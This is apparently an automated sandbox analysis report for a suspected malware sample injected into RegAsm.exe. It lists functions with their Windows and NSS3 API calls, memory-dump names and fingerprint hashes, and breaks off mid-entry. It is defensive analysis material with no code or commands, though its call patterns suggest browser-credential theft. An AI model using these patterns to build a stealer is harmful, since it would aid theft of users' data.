API String ID: 502913869-3507145866
Opcode ID: 434c8229c4836c330fab94c2d564b46d60522ef0f9b055c1a3de0c45ea023f3a
Instruction ID: 7efa9aba5fe795319eab9692d3cd451cbeef3e168be70e8d3a699406c6956290
Opcode Fuzzy Hash: 434c8229c4836c330fab94c2d564b46d60522ef0f9b055c1a3de0c45ea023f3a
Instruction Fuzzy Hash: 8C012531E4010967CF10FBE6DD478CD7B74AF04358F514176FA0077152D778AA8A86D5

Function 00409072 Relevance: 2.7, APIs: 2, Instructions: 163stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00416FD4,004366CB,?,?,?,?,004184E8), ref: 0041050D

lstrlenA.KERNEL32(?), ref: 00409209
lstrlenA.KERNEL32(?), ref: 00409224

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 00410650

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,00417542,004366F5), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,00417013,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 004105BD

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: 8d1aea62105906e0bc5092424bce8f4663fb5f5514132bbfba84a0a9be45898f
Instruction ID: 1e08b93d7cbef4025c21c6d6fa591af172ba60d51efd02bb0b075644e502fa0d
Opcode Fuzzy Hash: 8d1aea62105906e0bc5092424bce8f4663fb5f5514132bbfba84a0a9be45898f
Instruction Fuzzy Hash: 85511F71A001199BCF11FBA5EE468DE7775BF04309F511036F500B71E2DBB8AE498B99

Function 004077F8 Relevance: 2.6, APIs: 2, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,?,00003000,00000040,00000000,?,?,?,00407C18,?,?), ref: 0040784A
VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 00407874

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: c6430eb23dc0d7d1cfa83b0e51040b4b6edabef6f1a4a8c6a4ebf9c0008cfbe0
Instruction ID: b28f841dfd4acf8799594847afee1833b8dcb02ebcf8fb89bcc7c79a73626b37
Opcode Fuzzy Hash: c6430eb23dc0d7d1cfa83b0e51040b4b6edabef6f1a4a8c6a4ebf9c0008cfbe0
Instruction Fuzzy Hash: 0811AF72A04705ABC724CFB8C989B9BB7E4EB44714F24886EE64AE7390D278B940C614

Function 0041CB11 Relevance: 2.5, APIs: 2, Instructions: 39COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 0041CB22

Part of subcall function 0041BAC5: lstrlenA.KERNEL32(?,0041CB33,0041CBD5,00000000,06400000,00000003,00000000,004174D8,.exe,00436C50,00436C4C,00436C48,00436C44,00436C40,00436C3C,00436C38), ref: 0041BAF7
Part of subcall function 0041BAC5: malloc.MSVCRT ref: 0041BAFF
Part of subcall function 0041BAC5: lstrcpyA.KERNEL32(00000000,?), ref: 0041BB0A

malloc.MSVCRT ref: 0041CB5F

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: malloc$lstrcpylstrlen
String ID:
API String ID: 2974738957-0
Opcode ID: e62227c246ecb33e62193e20f845b21c81cd56cc10c09946d8e04765271bd1e4
Instruction ID: bcc52b98dded27733a1ddf11b2d72a8a096c545ee0eac75240f6a9d7f075788c
Opcode Fuzzy Hash: e62227c246ecb33e62193e20f845b21c81cd56cc10c09946d8e04765271bd1e4
Instruction Fuzzy Hash: 58F0F0729482225BC7105FA6FD8298BBB94EB457A4F094527FD08D7350CA34EC4186E9

Function 00418407 Relevance: 1.6, APIs: 1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d267c486132b1d14aba7fdb1782649ca3fc2362718e5d5cd96e7ce5bb2c7222
Instruction ID: 82dafb95f3647f371f080b5b9857093f804f2607734b4f28ec1fd5b50237ec4f
Opcode Fuzzy Hash: 6d267c486132b1d14aba7fdb1782649ca3fc2362718e5d5cd96e7ce5bb2c7222
Instruction Fuzzy Hash: F8515331D01202ABCA717BEE8549AF6B6D16FB0328B14059FE414AA273EF6D8DC44D6D

Function 00407BD2 Relevance: 1.6, APIs: 1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50cf22faddb2efbb802becd55b5695610fe54334f3658696c1c2f2d223f39b94
Instruction ID: 03c70ea2dac62522d08bdbbc5b79c1f18100801e5a13e89c56a31c563039a5a4
Opcode Fuzzy Hash: 50cf22faddb2efbb802becd55b5695610fe54334f3658696c1c2f2d223f39b94
Instruction Fuzzy Hash: 53319E71D0C2149FDF16DF55D8808AEBBB1EF84354B20806BE411B7391D738AE41DB9A

Function 00411DBC Relevance: 1.5, APIs: 1, Instructions: 34COMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00416FD4,004366CB,?,?,?,?,004184E8), ref: 0041050D

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FolderPathlstrcpy
String ID:
API String ID: 1699248803-0
Opcode ID: 952ee1242c9dae2285f603b3755d726c3dd6a97f1283711c6fe25f231cc47e39
Instruction ID: 5c97ce172be1dc6aca11d63f3a66f1e6df95be89718b380678747bf89416fdfb
Opcode Fuzzy Hash: 952ee1242c9dae2285f603b3755d726c3dd6a97f1283711c6fe25f231cc47e39
Instruction Fuzzy Hash: 19F05EB2E0016DABDB15DF78DC909EEB7FDEB48204F0005BAB909D3281DA349F458B94

Function 00411D92 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 35e56b7f075fcac9dcf552e8a255e138096be43e2f04e155c4c342c9ac325079
Instruction ID: 31a28c84126ccb9223757a29b4705142130dbe6096db615dad289fcc396a5d8e
Opcode Fuzzy Hash: 35e56b7f075fcac9dcf552e8a255e138096be43e2f04e155c4c342c9ac325079
Instruction Fuzzy Hash: BDD05E31A00138578B6097A9FC454DEBB09CB817B5B005223FA6D9A1F0C264AC9242C9

Function 00412541 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

SHFileOperationA.SHELL32(?), ref: 00412577

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FileOperation
String ID:
API String ID: 3080627654-0
Opcode ID: 148f95f85b309048aa87c3f9a12da0fa6706575fd3957cf6524d5d793fffaf6e
Instruction ID: 1f31be517929a5ffed956ad88a877dcbe8e32dc65eff02af70cb239a38efd5b2
Opcode Fuzzy Hash: 148f95f85b309048aa87c3f9a12da0fa6706575fd3957cf6524d5d793fffaf6e
Instruction Fuzzy Hash: 93E09AB0D0421E9FCF44EFE4D5152DDBAF8BF08308F40916AC515F3240E77552058BA9

Function 00411E1F Relevance: 1.3, APIs: 1, Instructions: 32memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,00000001,?,?,?,0041688A,?), ref: 00411E37

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: 9a028fc0657695adcd54af02a27d919c48769514d87d749e9ad114bb5a131cab
Instruction ID: 67f766e77eb82ae679a8a125a3cd519b0b9e5f1c613eeeb660a3d8dea1fef735
Opcode Fuzzy Hash: 9a028fc0657695adcd54af02a27d919c48769514d87d749e9ad114bb5a131cab
Instruction Fuzzy Hash: E8E02339A41B101FC372475988046B7BB5A9FC2F51708415BDF49C7324C535CC4141D4

Function 00407EAE Relevance: 1.3, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00407EB5

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: cd808f50b226156c54d12c7445b6016a60ba6ba0c8715662d5550310cd1c8d18
Instruction ID: a2ed24522b90cf8d72a71430dfd18e5bb138dd64580460ce79602bb5834a96d0
Opcode Fuzzy Hash: cd808f50b226156c54d12c7445b6016a60ba6ba0c8715662d5550310cd1c8d18
Instruction Fuzzy Hash: EAE0EDB1A10108BFEB40DBA9D845A9EBBF8EF44254F1440BAE905E3281E670EE009B55

Non-executed Functions

Function 6C176D90 Relevance: 60.3, APIs: 33, Strings: 1, Instructions: 809COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,6C27A8EC,0000006C), ref: 6C176DC6
memcpy.VCRUNTIME140(?,6C27A958,0000006C), ref: 6C176DDB
memcpy.VCRUNTIME140(?,6C27A9C4,00000078), ref: 6C176DF1
memcpy.VCRUNTIME140(?,6C27AA3C,0000006C), ref: 6C176E06
memcpy.VCRUNTIME140(?,6C27AAA8,00000060), ref: 6C176E1C
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C176E38

Part of subcall function 6C1FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C1FC2BF

PK11_DoesMechanism.NSS3(?,?), ref: 6C176E76
TlsGetValue.KERNEL32 ref: 6C17726F
EnterCriticalSection.KERNEL32(?), ref: 6C177283

Strings

!, xrefs: 6C177123

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: memcpy$Value$CriticalDoesEnterErrorK11_MechanismSection
String ID: !
API String ID: 3333340300-2657877971
Opcode ID: b08dd5ccf5b6c61ec0a5d5587bb6ab6e1113a90f15cbda6c1d982ee42f2a88dc
Instruction ID: 3e00951f1e1452af42ab79b9b98cdf1fb76cbd351430157862475924706f1ced
Opcode Fuzzy Hash: b08dd5ccf5b6c61ec0a5d5587bb6ab6e1113a90f15cbda6c1d982ee42f2a88dc
Instruction Fuzzy Hash: 49729D75D052189FDF61DF28CC8879ABBB5EB49304F1441E9E80CA7741EB35AA84CFA0

Function 6C0F8460 Relevance: 43.1, APIs: 23, Strings: 1, Instructions: 1095COMMON

Download Yara Rule

APIs

memcmp.VCRUNTIME140(?,00000000,00000030), ref: 6C0F84FF
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(377F0682), ref: 6C0F88BB
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(002DE218), ref: 6C0F88CE
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C0F88E2
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(FFFFFFFF), ref: 6C0F88F6
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C0F894F
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C0F895F
sqlite3_randomness.NSS3(00000008,?), ref: 6C0F8914

Part of subcall function 6C0E31C0: sqlite3_initialize.NSS3 ref: 6C0E31D6

sqlite3_randomness.NSS3(00000004,?), ref: 6C0F8A13
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C0F8A65
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000001), ref: 6C0F8A6F
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C0F8B87
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000001), ref: 6C0F8B94
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(002E5B33), ref: 6C0F8BAD

Strings

cannot limit WAL size: %s, xrefs: 6C0F9188

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: _byteswap_ulong$sqlite3_randomness$memcmpsqlite3_initialize
String ID: cannot limit WAL size: %s
API String ID: 2554290823-3503406041
Opcode ID: 6e99e9a93dfb732e049ccb3f269d08dd648570a9fd3ff0f385febc0a2661ecfe
Instruction ID: ac5e0f84cd5c881c2bffccfe13225666815330547a5d34a4c1c5c2a30ff1df03
Opcode Fuzzy Hash: 6e99e9a93dfb732e049ccb3f269d08dd648570a9fd3ff0f385febc0a2661ecfe
Instruction Fuzzy Hash: 34928F71A083019FD704CF29C894B5AB7F1BF89318F184A2DED9987751E735E986CB82

Function 6C1BAC30 Relevance: 39.5, APIs: 26, Instructions: 539memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?), ref: 6C1BACC4
PORT_ArenaAlloc_Util.NSS3(?,000040F4), ref: 6C1BACD5
memset.VCRUNTIME140(00000000,00000000,000040F4), ref: 6C1BACF3
SEC_ASN1EncodeInteger_Util.NSS3(?,00000018,00000003), ref: 6C1BAD3B
SECITEM_CopyItem_Util.NSS3(?,?,00000000), ref: 6C1BADC8
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C1BADDF
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C1BADF0

Part of subcall function 6C1FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C1FC2BF

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C1BB06A
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C1BB08C
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C1BB1BA
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C1BB27C
memset.VCRUNTIME140(?,00000000,00002010), ref: 6C1BB2CA
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C1BB3C1
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C1BB40C

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Util$Error$Arena_Free$ArenaItem_memset$Alloc_CopyEncodeInteger_Mark_ValueZfree
String ID:
API String ID: 1285963562-0
Opcode ID: 8ee49e94752b0b13a0484b006fca195184c32f2d308ec8babc23f7e0f46c0e55
Instruction ID: ef888e0f4df8682822ff573d8e9933fdcba2f9d60d3c55ff703aa0fe6dc5ec6c
Opcode Fuzzy Hash: 8ee49e94752b0b13a0484b006fca195184c32f2d308ec8babc23f7e0f46c0e55
Instruction Fuzzy Hash: DA22A071904301AFE710CF14CC84BAA77E1AF9430CF24856CE8596BB92E772E959CF92

Function 6C142560 Relevance: 37.3, APIs: 10, Strings: 11, Instructions: 533stringCOMMON

Download Yara Rule

APIs

